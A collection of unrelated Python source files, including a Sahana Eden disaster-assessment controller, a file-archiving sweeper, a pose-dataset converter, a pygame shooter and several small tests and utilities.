T("Missing Persons"): "missing_women",
T("General information on demographics"): "household_head_elderly",
T("Comments"): "comments"})
configure("assess_section3",
subheadings = {
T("Access to Shelter"): "houses_total",
T("Water storage containers in households"): "water_containers_available",
T("Other non-food items"): "cooking_equipment_available",
T("Shelter/NFI Assistance"): "nfi_assistance_available",
T("Comments"): "comments"})
configure("assess_section4",
subheadings = {
T("Water supply"): "water_source_pre_disaster_type",
T("Water collection"): "water_coll_time",
T("Places for defecation"): "defec_place_type",
T("Environment"): "close_industry",
T("Latrines"): "latrines_number",
T("Comments"): "comments"})
configure("assess_section5",
subheadings = {
T("Health services status"): "health_services_pre_disaster",
T("Current health problems"): "health_problems_adults",
T("Nutrition problems"): "malnutrition_present_pre_disaster",
T("Comments"): "comments"})
configure("assess_section6",
subheadings = {
T("Existing food stocks"): "food_stocks_main_dishes",
T("food_sources") : "Food sources",
T("Food assistance"): "food_assistance_available",
T("Comments"): "comments"})
configure("assess_section7",
subheadings = {
"%s / %s" % (T("Sources of income"),
T("Major expenses")): "income_sources_pre_disaster",
T("Business Damaged"): "Access to cash",
T("Current community priorities"): "rank_reconstruction_assistance",
T("Comments"): "comments"})
configure("assess_section8",
subheadings = {
T("Access to education services"): "schools_total",
T("Alternative places for studying"): "alternative_study_places_available",
T("School activities"): "schools_open_pre_disaster",
T("School attendance"): "children_0612_female",
T("School assistance"): "school_assistance_available",
T("Comments"): "comments"})
configure("assess_section9",
subheadings = {
T("Physical Safety"): "vulnerable_groups_safe_env",
T("Separated children, caregiving arrangements"): "children_separated",
T("Persons in institutions"): "children_in_disabled_homes",
T("Activities of children"): "child_activities_u12f_pre_disaster",
T("Coping Activities"): "coping_activities_elderly",
T("Current general needs"): "current_general_needs",
T("Comments"): "comments"})
# @ToDo Generalize this and make it available as a function that other
# component prep methods can call to set the default for a join field.
def prep(r):
if r.interactive:
# Pre-populate staff ID
staff_id = auth.s3_logged_in_human_resource()
if staff_id:
r.table.staff_id.default = staff_id
if r.method == "create":
# If this assessment is being created as a component of a shelter,
# it will have the shelter id in its vars.
shelter_id = r.get_vars.get("rat.shelter_id", None)
if shelter_id:
try:
shelter_id = int(shelter_id)
except ValueError:
pass
else:
r.table.shelter_id.default = shelter_id
return True
response.s3.prep = prep
# Post-processor
def postp(r, output):
s3_action_buttons(r, deletable=False)
# Redirect to update view to open tabs
if r.representation == "html" and r.method == "create":
r.next = r.url(method="", id=s3base.s3_get_last_record_id("assess_rat"))
return output
response.s3.postp = postp
# Over-ride the listadd since we're not a component here
configure(tablename, create_next="", listadd=True)
tabs = [(T("Identification"), None),
(T("Demographic"), "section2"),
(T("Shelter & Essential NFIs"), "section3"),
(T("WatSan"), "section4"),
(T("Health"), "section5"),
(T("Nutrition"), "section6"),
(T("Livelihood"), "section7"),
(T("Education"), "section8"),
(T("Protection"), "section9") ]
rheader = lambda r: rat_rheader(r,
tabs)
output = s3_rest_controller(rheader=rheader,
s3ocr_config={"tabs": tabs})
response.s3.stylesheets.append( "S3/rat.css" )
return output
# -----------------------------------------------------------------------------
def rat_rheader(r, tabs=[]):
""" Resource Headers """
if r.representation == "html":
if r.name == "rat":
report = r.record
if report:
htable = db.hrm_human_resource
rheader_tabs = s3_rheader_tabs(r, tabs, paging=True)
location = report.location_id
if location:
location = r.table.location_id.represent(location)
organisation_represent = htable.organisation_id.represent
organisation_id = None
staff = report.staff_id
if staff:
query = (htable.id == staff)
organisation_id = db(query).select(htable.organisation_id,
limitby=(0, 1)).first().organisation_id
organisation = organisation_represent(organisation_id)
else:
organisation = None
staff = report.staff2_id
if staff:
query = (htable.id == staff)
organisation2_id = db(query).select(htable.organisation_id,
limitby=(0, 1)).first().organisation_id
if organisation2_id == organisation_id:
organisation2 = None
else:
organisation2 = organisation_represent(organisation2_id)
else:
organisation2 = None
if organisation2:
orgs = "%s, %s" % (organisation, organisation2)
else:
orgs = organisation
rheader = DIV(TABLE(
TR(
TH("%s: " % T("Location")), location,
TH("%s: " % T("Date")), report.date
),
TR(
TH("%s: " % T("Organizations")), orgs,
)
),
rheader_tabs)
return rheader
return None
# =============================================================================
# Flexible Impact Assessments
# =============================================================================
def assess_rheader(r, tabs=[]):
""" Resource Headers for Flexible Impact Assessments """
if r.representation == "html":
rheader_tabs = s3_rheader_tabs(r, tabs)
assess = r.record
if assess:
table = db.assess_assess
rheader = DIV(TABLE(TR(
TH("%s: " % T("Date & Time")),
table.datetime.represent(assess.datetime),
TH("%s: " % T("Location")),
table.location_id.represent(assess.location_id),
TH("%s: " % T("Assessor")),
table.assessor_person_id.represent(assess.assessor_person_id),
),
),
rheader_tabs
)
return rheader
return None
# -----------------------------------------------------------------------------
def assess():
""" RESTful CRUD controller """
# Load Models
assess_tables()
impact_tables()
tablename = "%s_%s" % (module, resourcename)
table = db[tablename]
# Pre-processor
def prep(r):
if session.s3.mobile and r.method == "create" and r.interactive:
# redirect to mobile-specific form:
redirect(URL(f="assess_short_mobile"))
return True
response.s3.prep = prep
#table.incident_id.comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Incident"),
# T("Optional link to an Incident which this Assessment was triggered by.")))
tabs = [
(T("Edit Details"), None),
(T("Baselines"), "baseline"),
(T("Impacts"), "impact"),
(T("Summary"), "summary"),
#(T("Requested"), "ritem"),
]
rheader = lambda r: assess_rheader(r, tabs)
return s3_rest_controller(rheader=rheader)
# -----------------------------------------------------------------------------
def impact_type():
""" RESTful CRUD controller """
# Load Models
impact_tables()
module = "impact"
resourcename = "type"
return s3_rest_controller(module, resourcename)
# -----------------------------------------------------------------------------
def baseline_type():
""" RESTful CRUD controller """
# Load Models
assess_tables()
return s3_rest_controller()
# -----------------------------------------------------------------------------
def baseline():
""" RESTful CRUD controller """
# Load Models
assess_tables()
return s3_rest_controller()
# -----------------------------------------------------------------------------
def summary():
""" RESTful CRUD controller """
# Load Models
assess_tables()
return s3_rest_controller()
# =============================================================================
def basic_assess():
""" Custom page to hide the complexity of the Assessments/Impacts/Summary model: PC Browser version """
if not auth.is_logged_in():
session.error = T("Need to be logged-in to be able to submit assessments")
redirect(URL(c="default", f="user", args=["login"]))
# Load Models
assess_tables()
impact_tables()
# See if we've been created from an Incident
ireport_id = request.vars.get("ireport_id")
if ireport_id:
# Location is the same as the calling Incident
table = db.irs_ireport
row = db(table.id == ireport_id).select(table.location_id,
limitby=(0, 1)).first()
if row:
irs_location_id = row.location_id
location = table.location_id.represent(irs_location_id)
else:
irs_location_id = None
location = None
custom_assess_fields = (
("impact", 1),
("impact", 2),
("impact", 3),
("impact", 4),
("impact", 5),
("impact", 6),
("impact", 7),
("assess", "comments"),
)
form, form_accepted, assess_id = custom_assess(custom_assess_fields,
location_id=irs_location_id)
else:
location = None
custom_assess_fields = (
("assess", "location_id", "selector"),
("impact", 1),
("impact", 2),
("impact", 3),
("impact", 4),
("impact", 5),
("impact", 6),
("impact", 7),
("assess", "comments"),
)
form, form_accepted, assess_id = custom_assess(custom_assess_fields)
if form_accepted:
session.confirmation = T("Basic Assessment Reported")
redirect(URL(f="assess", args=[assess_id, "impact"]))
return dict(title = T("Basic Assessment"),
location = location,
form = form)
# -----------------------------------------------------------------------------
def mobile_basic_assess():
""" Custom page to hide the complexity of the Assessments/Impacts/Summary model: Mobile device version """
if not auth.is_logged_in():
redirect(URL(c="default", f="index"))
# Load Models
assess_tables()
impact_tables()
custom_assess_fields = (
("assess", "location_id", "auto"),
("impact", 1),
("impact", 2),
("impact", 3),
("impact", 4),
("impact", 5),
("impact", 6),
("impact", 7),
("assess", "comments"),
)
form, form_accepted, assess_id = custom_assess(custom_assess_fields)
if form_accepted:
form = FORM(H1(settings.get_system_name_short()),
H2(T("Short Assessment")),
P(T("Assessment Reported")),
A(T("Report Another Assessment..."),
_href = URL(r=request)
),
_class = "mobile",
)
return dict(form = form)
# -----------------------------------------------------------------------------
def color_code_severity_widget(widget, name):
""" Utility function to colour-code Severity options """
for option, color in zip(widget, ["green", "yellow", "orange", "red"]):
option[0].__setitem__("_style", "background-color:%s;" % color)
option[0][0].__setitem__("_name", name)
return widget
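# Note: zip() stops at the shorter sequence, so only the first four options are
# coloured green/yellow/orange/red (any extra options keep their default styling),
# and each paired option's inner input is renamed to the supplied name.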
# -----------------------------------------------------------------------------
def custom_assess(custom_assess_fields, location_id=None):
"""
Build a custom page to hide the complexity of the
Assessments/Impacts/Summary model
@ToDo: Improved validation
- the existing .double JS isn't 100% reliable & this currently crashes
the back-end upon submission if bad data slips through
"""
# Load Models
assess_tables()
impact_tables()
form_rows = []
comment = ""
for field in custom_assess_fields:
name = "custom_%s_%s" % (field[0], field[1])
if field[0] == "assess":
if field[1] == "comments":
label = "%s:" % db.assess_assess[ field[1] ].label
#widget = db.assess_assess[ field[1] ].widget
widget = TEXTAREA(_name = name,
_class = "double",
_type = "text")
elif field[1] == "location_id":
if field[2] == "auto":
# HTML5 Geolocate
label = "%s:" % T("Location")
#widget = db.assess_assess[ field[1] ].widget
widget = DIV(INPUT(_name = name,
_type = "text"),
INPUT(_name = "gis_location_lat",
_id = "gis_location_lat",
_type = "text"),
INPUT(_name = "gis_location_lon",
_id = "gis_location_lon",
_type = "text"))
else:
# Location Selector
label = "%s:" % T("Location")
#widget = SELECT(_id = name,
# _class = "reference gis_location",
# _name = "location_id")
#response.s3.gis.location_id = "custom_assess_location_id"
widget = db.assess_assess.location_id.widget(field=db.assess_assess.location_id,
value="")
elif field[0] == "baseline":
label = S3Represent(lookup="assess_baseline_type")(field[1])
label = "%s:" % T(label)
widget = INPUT(_name = name,
_class = "double",
_type = "text")
elif field[0] == "impact":
label = S3Represent(lookup="assess_impact_type")(field[1])
label = "%s:" % T(label)
value_widget = INPUT(_name = name,
_class = "double",
_type = "text")
severity_widget = db.assess_summary.value.widget(db.impact_impact.severity,
0,
_name = "%s_severity" % name
)
severity_widget = color_code_severity_widget(severity_widget,
"%s_severity" % name)
widget = DIV(value_widget,
DIV("%s:" % T("Severity")),
severity_widget,
XML(" "))
elif field[0] == "summary":
label = "%s:" % T(org_subsector_represent(field[1]))
widget = db.assess_summary.value.widget(db.assess_summary.value,
0, _name = name)
widget = color_code_severity_widget(widget, name)
# Add the field components to the form_rows
if field[0] == "title":
form_rows.append(TR(H3( field[1] )))
else:
form_rows = form_rows + list(s3_formstyle("%s__row" % name,
label,
widget,
comment))
form = FORM(TABLE(*form_rows),
INPUT(_value = T("Save"), _type = "submit"))
assess_id = None
form_accepted = form.accepts(request.vars, session)
if form_accepted:
record_dict = {"organisation_id" : session.s3.organisation_id}
for field in custom_assess_fields:
if field[0] != "assess" or field[1] == "location_id":
continue
name = "custom_%s_%s" % (field[0], field[1])
if name in request.vars:
record_dict[field[1]] = request.vars[name]
# Add Location (must happen first)
if "custom_assess_location_id" in request.vars:
# Auto
location_dict = {}
if "gis_location_lat" in request.vars:
location_dict["lat"] = request.vars["gis_location_lat"]
if "gis_location_lon" in request.vars:
location_dict["lon"] = request.vars["gis_location_lon"]
location_dict["name"] = request.vars["custom_assess_location_id"]
record_dict["location_id"] = s3db.gis_location.insert(**location_dict)
if "location_id" in request.vars:
# Location Selector
record_dict["location_id"] = request.vars["location_id"]
if location_id:
# Location_id was passed to function
record_dict["location_id"] = location_id
# Add Assessment
assess_id = db.assess_assess.insert(**record_dict)
fk_dict = dict(baseline = "baseline_type_id",
impact = "impact_type_id",
summary = "subsector_id"
)
component_dict = dict(baseline = "assess_baseline",
impact = "impact_impact",
summary = "assess_summary"
)
# Add Assessment Components
sector_summary = {}
for field in custom_assess_fields:
if field[0] == "assess":
continue
record_dict = {}
name = "custom_%s_%s" % (field[0], field[1])
if name in request.vars:
record_dict["assess_id"] = assess_id
record_dict[fk_dict[ field[0] ] ] = field[1]
record_dict["value"] = request.vars[name]
if field[0] == "impact":
severity = int(request.vars[name + "_severity"])
record_dict["severity"] = severity
if not record_dict["value"] and not record_dict["severity"]:
# Do not record impact if there is no data for it.
# Should we still average severity though? Now not doing this
continue
# Record the Severity per sector
table = db.impact_type
row = db(table.id == field[1]).select(table.sector_id,
limitby=(0, 1)
).first()
sector_id = row.sector_id
if sector_id in sector_summary.keys():
sector_summary[sector_id].append(severity)
elif sector_id:
sector_summary[sector_id] = [severity]
db[component_dict[ field[0] ] ].insert(**record_dict)
# Add Cluster summaries
# @ToDo: make sure that this doesn't happen if there are sectors in the assess
for sector_id in sector_summary.keys():
severity_values = sector_summary[sector_id]
db.assess_summary.insert(assess_id = assess_id,
sector_id = sector_id,
# Average severity
value = sum(severity_values) / len(severity_values)
)
# Send Out Notification SMS
#message = "Sahana: " + T("New Assessment reported from") + " %s by %s %s" % ( location_dict["name"],
# session.auth.user.first_name,
# session.auth.user.last_name
# )
# Hard coded notification message for Demo
#msg.send_by_pe_id(3,
# message=message,
# contact_method = 2)
return form, form_accepted, assess_id
# =============================================================================
def type():
""" RESTful CRUD controller """
return s3_rest_controller("impact", "type")
# =============================================================================
def impact():
""" RESTful CRUD controller """
return s3_rest_controller("impact", "impact")
# END =========================================================================
|
# -*- coding: utf-8 -*-
from iscc_schema import generator
def test_iscc_request():
r = generator.IsccCodePostRequest(source_url="https://example.com")
assert r.json(exclude_unset=True) == '{"source_url": "https://example.com"}'
def test_data_uri():
durl = "data:application/json;charset=utf-8;base64,eyJleHRlbmRlZCI6Im1ldGFkYXRhIn0="
r = generator.IsccCodePostRequest(meta=durl)
assert r.meta == durl
def test_ipfs_uri():
ipfs = "ipfs://f01551220b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9"
r = generator.MediaEmbeddedMetadata(license=ipfs)
assert r.license == ipfs
|
# Generated by Django 2.2.4 on 2019-08-09 17:28
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('editor', '0003_auto_20190809_1724'),
]
operations = [
migrations.RenameModel(
old_name='PythonLabs',
new_name='PythonLab',
),
]
|
from pathlib import Path
from datetime import datetime, timezone
from onamazu import db_file_operator as dfo
import os
import shutil
import logging
import zipfile
logger = logging.getLogger("o-namazu")
def sweep(config, now: datetime = None):
if now is None:
now = datetime.now()
logger.debug(f"Sweeep started. config:{config}, now:{now}")
dfo.update_all_db_files(config, _sweep_callback, {"now": now})
def _sweep_callback(dbs: dict, config_all: dict, obj: dict):
now = obj['now']
for dir, dir_db in dbs.items():
dir_config = config_all[dir]
dir_path = Path(dir)
expired_file_list = _sweep_directory_list_target(dir_path, dir_db, dir_config, now)
_sweep_directory_files(dir_path, expired_file_list, dir_db, dir_config, now)
def _sweep_directory_list_target(dir_path: Path, dir_db: dict, dir_config: dict, now: datetime) -> list:
# Path: last_detected
last_detected_list = {str(dir_path / file): d["last_detected"] for file, d in dir_db["watching"].items()}
now_timestamp = now.timestamp()
ttl = dir_config["ttl"]
if ttl <= 0: # 0 is soon, -1 is never archive.
return []
for f, l_timestamp in last_detected_list.items():
diff = now_timestamp - l_timestamp
logger.debug(f"Sweep test: {dir_path / f}: {l_timestamp}. diff = {diff}, ttl = {ttl}")
return [Path(f) for f, l_timestamp in last_detected_list.items() if now_timestamp - l_timestamp >= ttl]
def _sweep_directory_files(dir_path: Path, files: list, dir_db: dict, dir_config: dict, now: datetime = None):
if now is None:
now = datetime.now()
ttl = dir_config["ttl"]
archive = dir_config["archive"]
archive_type = archive.get("type", "directory")
archive_name = archive.get("name", "_archive")
# Type: delete
if archive_type == "delete":
for file in files:
try:
os.remove(str(file))
logger.info(f"Deleted file '{file}' because ttl({ttl}) is expired.")
except Exception:
logger.exception(f"Delete '{file}' failed.")
finally:
del dir_db["watching"][str(file.name)]
return
archive_path = dir_path / archive_name
# Type: zip
if archive_type == "zip":
with zipfile.ZipFile(str(archive_path), 'a', compression=zipfile.ZIP_DEFLATED) as zip_file:
for file in files:
arcname = file.name
if file.name in zip_file.namelist():
arcname = __generate_name_with_datetime(file, now)
try:
zip_file.write(str(file), arcname=arcname)
os.remove(str(file))
logger.info(f"Archive file '{file}' into zip `{archive_path}` because ttl({ttl}) is expired.")
except Exception:
logger.exception(f"Delete '{file}' failed.")
finally:
del dir_db["watching"][str(file.name)]
return
# Type: directory
if archive_type == "directory":
if not archive_path.exists():
archive_path.mkdir(parents=True)
for file in files:
try:
logger.info(f"Archive file '{file}' into `{archive_path}` because ttl({ttl}) is expired.")
dst_file_path = archive_path / file.name
if dst_file_path.exists():
dst_file_path = archive_path / __generate_name_with_datetime(file, now)
logger.warning(f"Archive file '{file}' is already exists in `{archive_path}`. It will be save as '{dst_file_path}")
shutil.move(str(file), str(dst_file_path))
except Exception:
logger.exception(f"Move '{file}' failed.")
finally:
del dir_db["watching"][str(file.name)]
return
def __generate_name_with_datetime(file_path: Path, now: datetime):
return file_path.stem + '_' + now.strftime('%Y%m%d%H%M%S') + file_path.suffix
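# Minimal usage sketch. The dir-config keys below mirror the ones read by
# _sweep_directory_files (ttl, archive.type, archive.name); the concrete values
# are illustrative assumptions, not o-namazu defaults.
if __name__ == "__main__":
    example_dir_config = {
        "ttl": 3600,  # seconds a file may stay untouched before it is swept
        "archive": {"type": "zip", "name": "archive.zip"},  # also: "directory", "delete"
    }
    demo_now = datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc)
    # Collision-avoiding archive name, e.g. 'report_20210102030405.csv'
    print(__generate_name_with_datetime(Path("report.csv"), demo_now))
    print(example_dir_config)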
|
class Container(object):
""" Holds hashable objects. Objects may occur 0 or more times """
def __init__(self):
""" Creates a new container with no objects in it. I.e., any object
occurs 0 times in self. """
self.vals = {}
def insert(self, e):
""" assumes e is hashable
Increases the number of times e occurs in self by 1. """
try:
self.vals[e] += 1
except KeyError:
self.vals[e] = 1
def __str__(self):
s = ""
for i in sorted(self.vals.keys()):
if self.vals[i] != 0:
s += str(i)+":"+str(self.vals[i])+"\n"
return s
class Bag(Container):
def remove(self, e):
""" assumes e is hashable
If e occurs in self, reduces the number of
times it occurs in self by 1. Otherwise does nothing. """
# print(e, self.vals)
if e in self.vals:
self.vals[e] -= 1
def count(self, e):
""" assumes e is hashable
Returns the number of times e occurs in self. """
try:
return self.vals[e]
except KeyError:
return 0
# d1 = Bag()
# d1.insert(4)
# d1.insert(4)
# print(d1)
# d1.remove(2)
# print(d1)
d1 = Bag()
d1.insert(4)
d1.insert(4)
d1.insert(4)
print(d1)
d1.remove(4)
print(d1)
print(d1.count(2))
print(d1.count(4))
d1 = Bag()
d1.insert(4)
d1.insert(4)
d1.insert(4)
print(d1.count(2))
print(d1.count(4))
|
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from pirates.piratesgui import PiratesGuiGlobals
import types
class ButtonListItem(DirectButton):
def __init__(self, item, itemHeight, itemWidth, parent=None, parentList=None, textScale=None, txtColor=None, **kw):
optiondefs = (
(
'state', DGG.NORMAL, None), ('image', None, None), ('image_scale', (0.24, 0.22, 0.22), None), ('image_pos', (0.185, 0, 0.043), None), ('frameColor', (0.1, 0.1, 1, 0.08), None), ('borderWidth', PiratesGuiGlobals.BorderWidth, None), ('frameSize', (0.0, itemWidth, 0.0, itemHeight), None))
self.defineoptions(kw, optiondefs)
DirectButton.__init__(self, parent)
self.initialiseoptions(ButtonListItem)
self.textScale = textScale
if not self.textScale:
self.textScale = PiratesGuiGlobals.TextScaleLarge
self.item = item.get('Text')
self.descText = None
self.valueTexts = []
self.textColor = txtColor
if not self.textColor:
self.textColor = PiratesGuiGlobals.TextFG1
self.parentList = parentList
self.value = item.get('Value')
self.defaultColorScale = (0.75, 0.75, 0.75, 1)
self.setColorScale(*self.defaultColorScale)
self.prevImageScale = None
self.locked = False
return
def setup(self):
self._createIface()
def destroy(self):
self._destroyIface()
self.parentList = None
DirectButton.destroy(self)
self.ignoreAll()
return
def _createIface(self):
if type(self.item) is types.ListType:
itemText = self.item[0]
else:
itemText = self.item
self['text'] = itemText
self['text_scale'] = self.textScale
self['text_fg'] = self.textColor
self['text_pos'] = (self.getWidth() / 2, 0.025)
self.prevImageScale = self['image_scale']
def _destroyIface(self):
pass
def _handleItemChange(self):
self._destroyIface()
self._createIface()
def commandFunc(self, event):
DirectButton.commandFunc(self, event)
if not self.locked:
self.parentList.itemSelect(self)
def setSelected(self, selected):
self.selected = selected
if selected:
self.setColorScale(1, 1, 1, 1)
self.prevImageScale = self['image_scale']
self['image_scale'] = (0.25, 0.23, 0.23)
else:
self.setColorScale(*self.defaultColorScale)
self['image_scale'] = self.prevImageScale
|
from .is_file import is_file
from .is_string import is_string
|
import glob
import pandas as pd
from statistics import stdev
CSV_DIRECTORY = "Concussion Subject Data/*"
PROCESSED_CSV_TITLE = "processed_data"
FILES = glob.glob(f"{CSV_DIRECTORY}/*.csv")
DATAFRAMES = [pd.read_csv(filename) for filename in FILES]
def abs_diff(dataframe, column_name: str) -> list:
"""Return the absolute difference of values
between each row in a given column.
"""
column_data = dataframe[column_name].tolist()
abs_diff_column = []
for i in range(1, len(column_data)):
abs_diff = abs(column_data[i] - column_data[i - 1])
abs_diff_column.append(abs_diff)
return abs_diff_column
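# e.g. for a column holding [1.0, 4.0, 2.5] this returns [3.0, 1.5]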
def get_results(column_name: str):
abs_diff_sum = []
standard_deviation = []
for frame in DATAFRAMES:
frame = abs_diff(frame, column_name)
abs_diff_sum.append(sum(frame))
standard_deviation.append(stdev(frame))
return abs_diff_sum, standard_deviation
CoPx_abs_diff_sum, CoPx_abs_diff_stdev = get_results("CoPx")
CoPy_abs_diff_sum, CoPy_abs_diff_stdev = get_results("CoPy")
subject, filename, condition, trial_number = ([] for _ in range(4))
for file_name in sorted(FILES):
file_name = file_name.rsplit('/', 1)[-1].split('.')[0].split('_', 1)[-1]
filename.append(file_name)
subject.append(file_name.split('_', 1)[0])
condition.append(file_name.rsplit('_', 1)[0].split('_', 1)[-1])
trial_number.append(
''.join(s for s in file_name.split('_') if s.isdigit()))
columns = {
'Subject': subject, 'Condition': condition, 'Trial No.': trial_number,
'CoPx Excursion': CoPx_abs_diff_sum, 'CoPx SD': CoPx_abs_diff_stdev,
'CoPy Excursion': CoPy_abs_diff_sum, 'CoPy SD': CoPy_abs_diff_stdev
}
new_dataframe = pd.DataFrame()
for column_name, column_data in columns.items():
new_dataframe[column_name] = column_data
new_dataframe.to_csv(f"{CSV_DIRECTORY.split('/')[0]}/{PROCESSED_CSV_TITLE}.csv",
index=False, index_label=False)
|
'''Setup all relevant packages.'''
from . import utils
from . import statements
from . import profile
from . import indicators
from . import prices
|
from time import time
import numpy as np
import scipy.io as sio
from os.path import join
from tqdm import tqdm
from converter.tfrecord_converter import TFRecordConverter, DataSetConfig, DataSetSplit
class MpiiConverter(TFRecordConverter):
def __init__(self):
self.num_kps = 16
self.mpii_order = ['ankle_r', 'knee_r', 'hip_r', 'hip_l', 'knee_l', 'ankle_l', 'pelvis', 'thorax', 'neck',
'brain', 'wrist_r', 'elbow_r', 'shoulder_r', 'shoulder_l', 'elbow_l', 'wrist_l']
super().__init__()
def prepare_data(self):
print('loading annotations into memory...')
ann_path = join(self.data_dir, 'annotations', 'mpii_human_pose_v1_u12_1.mat')
annotations = sio.loadmat(ann_path, struct_as_record=False, squeeze_me=True)['RELEASE']
ids = np.array(range(len(annotations.annolist)))
train_indices = annotations.img_train.astype(bool)
train_ids = ids[train_indices]
self.data_set_splits.append(self.create_dataset_split(annotations, train_ids, 'train'))
# can't use testing set because ground truth is not available, only generate for submission purpose
# val_indices = np.logical_not(train_indices)
# val_ids = ids[val_indices]
# self.data_set_splits.append(self.create_dataset_split(annotations, val_ids, 'val'))
def create_dataset_split(self, annotations, img_ids, name):
def convert_vis(value):
if type(value) == int or (type(value) == str and value in ['1', '0']):
return int(value)
elif isinstance(value, np.ndarray):
return int(value.size != 0)
else:
return 0
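# e.g. convert_vis(1) -> 1, convert_vis("0") -> 0, convert_vis(np.array([])) -> 0
# (an empty array means the visibility flag is absent in the annotation)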
images, kps_2d, vis = [], [], []
img_dir = join(self.data_dir, 'images')
print("prepare {} mpii annotations for conversion".format(name))
for img_id in tqdm(img_ids):
try:
ann_info = annotations.annolist[img_id]
single_persons = annotations.single_person[img_id]
if not isinstance(single_persons, np.ndarray):
single_persons = np.array([single_persons])
if single_persons.size == 0:
continue
rects = ann_info.annorect
if not isinstance(rects, np.ndarray):
rects = np.array([rects])
persons = rects[single_persons - 1]
for person in persons:
points = person.annopoints.point
if not isinstance(points, np.ndarray):
# There is only one! so ignore this image
continue
kp2d = np.zeros((self.num_kps, 2), np.float32)
v = np.zeros((self.num_kps,), np.float32)
for p in points:
kp2d[p.id] = [p.x, p.y]
v[p.id] = convert_vis(p.is_visible)
images.append(join(img_dir, ann_info.image.name))
kps_2d.append(kp2d)
vis.append(v)
except (AttributeError, TypeError):
print('error while reading annotation for image id {}'.format(img_id))
continue
images = np.asarray(images)
kps_2d = np.asarray(kps_2d, dtype=np.float32)
vis = np.asarray(vis, dtype=np.int64)
mpii_config = DataSetConfig(name, False, self.mpii_order)
return DataSetSplit(mpii_config, images, kps_2d, vis)
if __name__ == '__main__':
t0 = time()
mpii_converter = MpiiConverter()
print('Done (t={})\n\n'.format(time() - t0))
|
from pygame import *
from random import randint
window = display.set_mode((700,500))
background = transform.scale(image.load("galaxy.jpg"),(700,500))
class GameSprite(sprite.Sprite):
def __init__(self, player_image,x,y,size_x,size_y,speed):
sprite.Sprite.__init__(self)
self.image = transform.scale(image.load(player_image),(size_x,size_y))
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
self.speed = speed
def render(self):
window.blit(self.image,(self.rect.x,self.rect.y))
class Player(GameSprite):
def update(self):
keys = key.get_pressed()
if keys[K_LEFT]:
self.rect.x -= self.speed
if keys[K_RIGHT]:
self.rect.x += self.speed
def fire(self):
bullet = Bullet("bullet.png",self.rect.centerx , self.rect.top,15,20,10)
bullets.add(bullet)
killed = 0
lost = 0
class Enemy(GameSprite):
def update(self):
global lost
self.rect.y += self.speed
if self.rect.y > 500:
lost += 1
print(lost)
self.rect.y = 0
self.rect.x = randint(40, 660)
player = Player("rocket.png", 250, 400, 80, 100, 10)
enemies = sprite.Group()
bullets = sprite.Group()
for i in range(1 , 6):
enemy1 = Enemy("ufo.png", randint(40, 660) , 0 , 80, 50, randint(1,3))
enemies.add(enemy1)
class Bullet(GameSprite):
def update(self):
self.rect.y -= self.speed
if self.rect.y < 0 :
self.kill()
game = True
clock = time.Clock()
font.init()
font_1 = font.Font(None, 24)
font_2 = font.Font(None, 80)
font_3 = font.Font(None, 48)
font_4 = font.Font(None, 48)
win = font_2.render("YOU WIN", True, (255,255,255))
lose = font_2.render("YOU LOSE", True, (180, 0, 0))
#player = player("rocket.png", 250, 400, 80, 100, 10)
restart_button = GameSprite("restart.png",210,250,200,100,0)
while game:
for e in event.get():
if e.type == QUIT:
game = False
if e.type == KEYDOWN:
if e.key == K_SPACE:
player.fire()
collide = sprite.groupcollide(enemies, bullets, True, True)
for c in collide:
enemy1 = Enemy("ufo.png", randint(40, 660) , 0 , 80, 50, randint(1,3))
enemies.add(enemy1)
killed += 1
window.blit(background,(0,0))
lost_text = font_3.render(str(lost), False, (255,255,255))
killed_text = font_3.render(str(killed), False, (255,255,255))
window.blit(lost_text, (10, 10))
window.blit(killed_text, (10, 40))
if lost >= 10:
window.blit(lose, (150,200))
restart_button.render()
for e in enemies:
e.kill()
if sprite.spritecollide(restart_button,bullets,True):
lost = 0
killed = 0
time.delay(500)
for i in range(1 , 6):
enemy1 = Enemy("ufo.png", randint(40, 660) , 0 , 80, 50, randint(1,3))
enemies.add(enemy1)
if killed >= 100:
window.blit(win, (150,200))
restart_button.render()
for e in enemies:
e.kill()
if sprite.spritecollide(restart_button,bullets,True):
lost = 0
killed = 0
time.delay(500)
for i in range(1 , 6):
enemy1 = Enemy("ufo.png", randint(40, 660) , 0 , 80, 50, randint(1,3))
enemies.add(enemy1)
player.update()
player.render()
enemies.update()
enemies.draw(window)
bullets.draw(window)
bullets.update()
display.update()
clock.tick(48)
|
import pytest
from energytechnomodels import Bath
@pytest.fixture()
def fix_create():
b = Bath(2.7, 2.7, t_bath_init=50.0)
b.p_heat = 50E3
b.step(2, "hours")
return b
def test_bath_step(fix_create):
b = fix_create
assert round(b.t_bath, 2) == 81.88
|
#!/usr/bin/env python3
#
# utils.py
"""
General utility functions.
"""
#
# Copyright © 2020 Dominic Davis-Foster <dominic@davis-foster.co.uk>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#
# stdlib
import re
import string
from typing import Iterable, Iterator, List, Optional, Tuple, Type
# 3rd party
from domdf_python_tools.stringlist import StringList
from domdf_python_tools.words import alpha_sort, ascii_digits
from isort import Config # type: ignore
from orderedset import OrderedSet # type: ignore
# this package
from dotnet_stub_builder.type_conversion import Converter
__all__ = [
"dedup",
"is_dunder",
"get_signature",
"make_property",
"get_child_attrs",
"method_alphabet",
"SKIP_ATTRS",
"isort_config",
